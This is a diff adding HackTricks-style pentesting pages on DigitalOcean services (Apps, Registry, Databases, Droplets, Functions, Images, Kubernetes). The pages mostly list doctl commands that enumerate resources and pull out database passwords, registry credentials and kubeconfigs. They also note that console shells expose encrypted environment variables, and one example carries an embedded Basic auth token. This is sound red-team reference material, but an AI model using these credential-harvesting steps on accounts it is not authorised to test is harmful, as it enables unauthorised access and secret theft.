--- /dev/null
+++ b/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md
@@ -0,0 +1,61 @@
+# DO - Apps
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+[From the docs:](https://docs.digitalocean.com/glossary/app-platform/) App Platform is a Platform-as-a-Service (PaaS) offering that allows developers to **publish code directly to DigitalOcean** servers without worrying about the underlying infrastructure.
+
+You can run code directly from **github**, **gitlab**, **docker hub**, **DO container registry** (or a sample app).
+
+When defining an **env var** you can set it as **encrypted**. The only way to **retreive** its value is executing **commands** inside the host runnig the app.
+
+An **App URL** looks like this [https://dolphin-app-2tofz.ondigitalocean.app](https://dolphin-app-2tofz.ondigitalocean.app)
+
+### Enumeration
+
+```bash
+doctl apps list # You should get URLs here
+doctl apps spec get <app-id> # Get yaml (including env vars, might be encrypted)
+doctl apps logs <app-id> # Get HTTP logs
+doctl apps list-alerts <app-id> # Get alerts
+doctl apps list-regions # Get available regions and the default one
+```
+
+{% hint style="danger" %}
+**Apps doesn't have metadata endpoint**
+{% endhint %}
+
+### RCE & Encrypted env vars
+
+To execute code directly in the container executing the App you will need **access to the console** and go to **`https://cloud.digitalocean.com/apps/<app-id>/console/<app-name>`**.
+
+That will give you a **shell**, and just executing **`env`** you will be able to see **all the env vars** (including the ones defined as **encrypted**).
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md
new file mode 100644
index 0000000000..72897f1e78
--- /dev/null
+++ b/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md
@@ -0,0 +1,59 @@
+# DO - Container Registry
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+DigitalOcean Container Registry is a service provided by DigitalOcean that **allows you to store and manage Docker images**. It is a **private** registry, which means that the images that you store in it are only accessible to you and users that you grant access to. This allows you to securely store and manage your Docker images, and use them to deploy containers on DigitalOcean or any other environment that supports Docker.
+
+When creating a Container Registry it's possible to **create a secret with pull images access (read) over it in all the namespaces** of Kubernetes clusters.
+
+### Connection
+
+```bash
+# Using doctl
+doctl registry login
+
+# Using docker (You need an API token, use it as username and as password)
+docker login registry.digitalocean.com
+Username: <paste-api-token>
+Password: <paste-api-token>
+```
+
+### Enumeration
+
+```bash
+# Get creds to access the registry from the API
+doctl registry docker-config
+
+# List
+doctl registry repository list-v2
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md
new file mode 100644
index 0000000000..d31d67c7be
--- /dev/null
+++ b/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md
@@ -0,0 +1,71 @@
+# DO - Databases
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+With DigitalOcean Databases, you can easily **create and manage databases in the cloud** without having to worry about the underlying infrastructure. The service offers a variety of database options, including **MySQL**, **PostgreSQL**, **MongoDB**, and **Redis**, and provides tools for administering and monitoring your databases. DigitalOcean Databases is designed to be highly scalable, reliable, and secure, making it an ideal choice for powering modern applications and websites.
+
+### Connections details
+
+When creating a database you can select to configure it **accessible from a public network**, or just from inside a **VPC**. Moreover, it request you to **whitelist IPs that can access it** (your IPv4 can be one).
+
+The **host**, **port**, **dbname**, **username**, and **password** are shown in the **console**. You can even download the AD certificate to connect securely.
+
+{% code overflow="wrap" %}
+```bash
+sql -h db-postgresql-ams3-90864-do-user-2700959-0.b.db.ondigitalocean.com -U doadmin -d defaultdb -p 25060
+```
+{% endcode %}
+
+### Enumeration
+
+```bash
+# Databse clusters
+doctl databases list
+
+# Auth
+doctl databases get <db-id> # This shows the URL with CREDENTIALS to access
+doctl databases connection <db-id> # Another way to egt credentials
+doctl databases user list <db-id> # Get all usernames and passwords
+
+# Dbs inside a database cluster
+doctl databases db list <cluster-id>
+
+# Firewall (allowed IPs), you can also add
+doctl databases firewalls list <cluster-id>
+
+# Backups
+doctl databases backups <db-id> # List backups of DB
+
+# Pools
+doctl databases pool list <db-id> # List pools of DB
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md
new file mode 100644
index 0000000000..b1cb6a795e
--- /dev/null
+++ b/pentesting-cloud/digital-ocean-pentesting/do-services/do-droplets.md
@@ -0,0 +1,109 @@
+# DO - Droplets
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+In DigitalOcean, a "droplet" is a v**irtual private server (VPS)** that can be used to host websites and applications. A droplet is a **pre-configured package of computing resources**, including a certain amount of CPU, memory, and storage, that can be quickly and easily deployed on DigitalOcean's cloud infrastructure.
+
+You can select from **common OS**, to **applications** already running (such as WordPress, cPanel, Laravel...), or even upload and use **your own images**.
+
+Droplets support **User data scripts**.
+
+<details>
+
+<summary>Difference between a snapshot and a backup</summary>
+
+In DigitalOcean, a snapshot is a point-in-time copy of a Droplet's disk. It captures the state of the Droplet's disk at the time the snapshot was taken, including the operating system, installed applications, and all the files and data on the disk.
+
+Snapshots can be used to create new Droplets with the same configuration as the original Droplet, or to restore a Droplet to the state it was in when the snapshot was taken. Snapshots are stored on DigitalOcean's object storage service, and they are incremental, meaning that only the changes since the last snapshot are stored. This makes them efficient to use and cost-effective to store.
+
+On the other hand, a backup is a complete copy of a Droplet, including the operating system, installed applications, files, and data, as well as the Droplet's settings and metadata. Backups are typically performed on a regular schedule, and they capture the entire state of a Droplet at a specific point in time.
+
+Unlike snapshots, backups are stored in a compressed and encrypted format, and they are transferred off of DigitalOcean's infrastructure to a remote location for safekeeping. This makes backups ideal for disaster recovery, as they provide a complete copy of a Droplet that can be restored in the event of data loss or other catastrophic events.
+
+In summary, snapshots are point-in-time copies of a Droplet's disk, while backups are complete copies of a Droplet, including its settings and metadata. Snapshots are stored on DigitalOcean's object storage service, while backups are transferred off of DigitalOcean's infrastructure to a remote location. Both snapshots and backups can be used to restore a Droplet, but snapshots are more efficient to use and store, while backups provide a more comprehensive backup solution for disaster recovery.
+
+</details>
+
+### Authentication
+
+For authentication it's possible to **enable SSH** through username and **password** (password defined when the droplet is created). Or **select one or more of the uploaded SSH keys**.
+
+### Firewall
+
+{% hint style="danger" %}
+By default **droplets are created WITHOUT A FIREWALL** (not like in oder clouds such as AWS or GCP). So if you want DO to protect the ports of the droplet (VM), you need to **create it and attach it**.
+{% endhint %}
+
+More info in:
+
+{% content-ref url="do-networking.md" %}
+[do-networking.md](do-networking.md)
+{% endcontent-ref %}
+
+### Enumeration
+
+```bash
+# VMs
+doctl compute droplet list # IPs will appear here
+doctl compute droplet backups <droplet-id>
+doctl compute droplet snapshots <droplet-id>
+doctl compute droplet neighbors <droplet-id> # Get network neighbors
+doctl compute droplet actions <droplet-id> # Get droplet actions
+
+# VM interesting actions
+doctl compute droplet-action password-reset <droplet-id> # New password is emailed to the user
+doctl compute droplet-action enable-ipv6 <droplet-id>
+doctl compute droplet-action power-on <droplet-id>
+doctl compute droplet-action disable-backups <droplet-id>
+
+# SSH
+doctl compute ssh <droplet-id> # This will just run SSH
+doctl compute ssh-key list
+doctl compute ssh-key import <key-name> --public-key-file /path/to/key.pub
+
+# Certificates
+doctl compute certificate list
+
+# Snapshots
+doctl compute snapshot list
+```
+
+{% hint style="danger" %}
+**Droplets have metadata endpoints**, but in DO there **isn't IAM** or things such as role from AWS or service accounts from GCP.
+{% endhint %}
+
+### RCE
+
+With access to the console it's possible to **get a shell inside the droplet** accessing the URL: **`https://cloud.digitalocean.com/droplets/<droplet-id>/terminal/ui/`**
+
+It's also possible to launch a **recovery console** to run commands inside the host accessing a recovery console in **`https://cloud.digitalocean.com/droplets/<droplet-id>/console`**(but in this case you will need to know the root password).
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md
new file mode 100644
index 0000000000..ad37aa9516
--- /dev/null
+++ b/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md
@@ -0,0 +1,88 @@
+# DO - Functions
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+DigitalOcean Functions, also known as "DO Functions," is a serverless computing platform that lets you **run code without having to worry about the underlying infrastructure**. With DO Functions, you can write and deploy your code as "functions" that can be **triggered** via **API**, **HTTP requests** (if enabled) or **cron**. These functions are executed in a fully managed environment, so you **don't need to worry** about scaling, security, or maintenance.
+
+In DO, to create a function first you need to **create a namespace** which will be **grouping functions**.\
+Inside the namespace you can then create a function.
+
+### Triggers
+
+The way **to trigger a function via REST API** (always enabled, it's the method the cli uses) is by triggering a request with an **authentication token** like:
+
+```bash
+curl -X POST "https://faas-lon1-129376a7.doserverless.co/api/v1/namespaces/fn-c100c012-65bf-4040-1230-2183764b7c23/actions/functionname?blocking=true&result=true" \
+  -H "Content-Type: application/json" \
+  -H "Authorization: Basic MGU0NTczZGQtNjNiYS00MjZlLWI2YjctODk0N2MyYTA2NGQ4OkhwVEllQ2t4djNZN2x6YjJiRmFGc1FERXBySVlWa1lEbUxtRE1aRTludXA1UUNlU2VpV0ZGNjNqWnVhYVdrTFg="
+```
+
+To see how is the **`doctl`** cli tool getting this token (so you can replicate it), the **following command shows the complete network trace:**
+
+```bash
+doctl serverless connect --trace
+```
+
+**When HTTP trigger is enabled**, a web function can be invoked through these **HTTP methods GET, POST, PUT, PATCH, DELETE, HEAD and OPTIONS**.
+
+{% hint style="danger" %}
+In DO functions, **environment variables cannot be encrypted** (at the time of this writing).\
+I couldn't find any way to read them from the CLI but from the console it's straight forward.
+{% endhint %}
+
+**Functions URLs** look like this: `https://<random>.doserverless.co/api/v1/web/<namespace-id>/default/<function-name>`
+
+### Enumeration
+
+```bash
+# Namespace
+doctl serverless namespaces list
+
+# Functions (need to connect to a namespace)
+doctl serverless connect
+doctl serverless functions list
+doctl serverless functions invoke <func-name>
+doctl serverless functions get <func-name>
+
+# Logs of executions
+doctl serverless activations list
+doctl serverless activations get <activation-id> # Get all the info about execution
+doctl serverless activations logs <activation-id> # get only the logs of execution
+doctl serverless activations result <activation-id> # get only the response result of execution
+
+# I couldn't find any way to get the env variables form the CLI
+```
+
+{% hint style="danger" %}
+There **isn't metadata endpoint** from the Functions sandbox.
+{% endhint %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md
new file mode 100644
index 0000000000..eaba5349db
--- /dev/null
+++ b/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md
@@ -0,0 +1,45 @@
+# DO - Images
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+DigitalOcean Images are **pre-built operating system or application images** that can be used to create new Droplets (virtual machines) on DigitalOcean. They are similar to virtual machine templates, and they allow you to **quickly and easily create new Droplets with the operating system** and applications that you need.
+
+DigitalOcean provides a wide range of Images, including popular operating systems such as Ubuntu, CentOS, and FreeBSD, as well as pre-configured application Images such as LAMP, MEAN, and LEMP stacks. You can also create your own custom Images, or use Images from the community.
+
+When you create a new Droplet on DigitalOcean, you can choose an Image to use as the basis for the Droplet. This will automatically install the operating system and any pre-installed applications on the new Droplet, so you can start using it right away. Images can also be used to create snapshots and backups of your Droplets, so you can easily create new Droplets from the same configuration in the future.
+
+### Enumeration
+
+```
+doctl compute image list
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md
new file mode 100644
index 0000000000..d91a05f1da
--- /dev/null
+++ b/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md
@@ -0,0 +1,65 @@
+# DO - Kubernetes (DOKS)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+### DigitalOcean Kubernetes (DOKS)
+
+DOKS is a managed Kubernetes service offered by DigitalOcean. The service is designed to **deploy and manage Kubernetes clusters on DigitalOcean's platform**. The key aspects of DOKS include:
+
+1. **Ease of Management**: The requirement to set up and maintain the underlying infrastructure is eliminated, simplifying the management of Kubernetes clusters.
+2. **User-Friendly Interface**: It provides an intuitive interface that facilitates the creation and administration of clusters.
+3. **Integration with DigitalOcean Services**: It seamlessly integrates with other services provided by DigitalOcean, such as Load Balancers and Block Storage.
+4. **Automatic Updates and Upgrades**: The service includes the automatic updating and upgrading of clusters to ensure they are up-to-date.
+
+### Connection
+
+```bash
+# Generate kubeconfig from doctl
+doctl kubernetes cluster kubeconfig save <cluster-id>
+
+# Use a kubeconfig file that you can download from the console
+kubectl --kubeconfig=/<pathtodirectory>/k8s-1-25-4-do-0-ams3-1670939911166-kubeconfig.yaml get nodes
+```
+
+### Enumeration
+
+```bash
+# Get clusters
+doctl kubernetes cluster list
+
+# Get node pool of cluster (number of nodes)
+doctl kubernetes cluster node-pool list <cluster-id>
+
+# Get DO resources used by the cluster
+doctl kubernetes cluster list-associated-resources <cluster-id>
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md
new file mode 100644
index 0000000000..29cf44eb18
--- /dev/null
+++ b/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md
@@ -0,0 +1,72 @@
+# DO - Networking
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
